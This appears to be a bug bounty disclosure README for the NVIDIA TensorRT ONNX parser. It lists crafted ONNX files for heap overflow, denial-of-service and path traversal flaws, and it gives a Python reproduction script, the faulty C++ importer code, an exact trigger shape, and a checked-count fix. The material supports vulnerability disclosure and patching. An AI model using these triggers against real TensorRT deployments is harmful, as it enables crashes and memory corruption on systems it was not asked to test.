TensorRT ONNX Parser - Security PoC Models
Bug bounty research submission to huntr.com targeting the NVIDIA TensorRT ONNX parser.
Vulnerabilities
| File | Vulnerability | CWE | Severity |
|---|---|---|---|
| eyelike_overflow.onnx | Integer overflow -> heap OOB write in EyeLike op | CWE-190, CWE-122 | Critical |
| eyelike_small_overflow.onnx | Same bug, faster crash trigger | CWE-190, CWE-122 | Critical |
| external_oom_length.onnx | Uncapped length field -> OOM denial of service | CWE-770 | High |
| external_abs_path.onnx | Absolute path traversal bypass in external weights | CWE-22 | Medium |
| external_neg_offset.onnx | Negative seek offset in external weights | CWE-20 | Medium |
| external_oob_offset.onnx | Read past EOF - uninitialized buffer risk | CWE-125 | Medium |
Reproduce (Finding 1 - Heap OOB Write)
```python
import tensorrt as trt

logger = trt.Logger(trt.Logger.VERBOSE)
builder = trt.Builder(logger)
network = builder.create_network(
    1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH))
parser = trt.OnnxParser(network, logger)

with open("eyelike_overflow.onnx", "rb") as f:
    parser.parse(f.read())
# Expected: SIGSEGV / heap-buffer-overflow
```
Root Cause (Finding 1)
```cpp
// onnxOpImporters.cpp - EyeLike importer
int totalWeights = dims.d[0] * dims.d[1]; // int32 overflow! dims are int64_t
std::vector<int> values(totalWeights);    // undersized allocation
for (int32_t r = 0; r < dims.d[0]; ++r)
    for (int32_t c = 0; c < dims.d[1]; ++c)
        values[r * dims.d[1] + c] = 0;    // OOB WRITE
```
Trigger: input shape [65537, 65536]
- True product: 4,295,032,832 (overflows int32)
- int32 truncated: 65,536 (vector too small)
- First OOB write: r=1, c=0 -> index 65,536
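
A checked element count for the allocation above, shown next to the narrowing it replaces. This is an added example, not TensorRT's code or a patch from this submission: `truncatedCount`, `checkedElementCount` and `kMaxEyeLikeElements` are hypothetical names, and the cap value is an assumption.

```cpp
#include <cstdint>
#include <cstdio>
#include <limits>

// Hypothetical cap on elements materialized for one EyeLike constant (assumed value).
constexpr int64_t kMaxEyeLikeElements = int64_t{1} << 28;

// Reproduces the narrowing from the root-cause snippet: the 64-bit product
// reduced modulo 2^32, which is what ends up sizing the vector.
int32_t truncatedCount(int64_t rows, int64_t cols)
{
    uint64_t const product = static_cast<uint64_t>(rows) * static_cast<uint64_t>(cols);
    return static_cast<int32_t>(static_cast<uint32_t>(product));
}

// Computes rows * cols in 64 bits. Returns false (and leaves *out untouched)
// when a dimension is negative, the product would overflow int64_t, or the
// result exceeds maxElements.
bool checkedElementCount(int64_t rows, int64_t cols, int64_t* out,
                         int64_t maxElements = kMaxEyeLikeElements)
{
    if (rows < 0 || cols < 0)
        return false;
    if (rows != 0 && cols > std::numeric_limits<int64_t>::max() / rows)
        return false;
    int64_t const total = rows * cols;
    if (total > maxElements)
        return false;
    *out = total;
    return true;
}

int main()
{
    int64_t total = 0;
    // Shape taken from the trigger on this page.
    std::printf("narrowed count for [65537, 65536]: %d\n", truncatedCount(65537, 65536));
    std::printf("checked  count for [65537, 65536]: %s\n",
                checkedElementCount(65537, 65536, &total) ? "accepted" : "rejected");
    // Constructed benign shape.
    if (checkedElementCount(3, 4, &total))
        std::printf("checked  count for [3, 4]: %lld\n", static_cast<long long>(total));
    return 0;
}
```

An importer using such a check would size the buffer from the accepted 64-bit count and index it with the same width, so the allocation and the loop bounds cannot disagree.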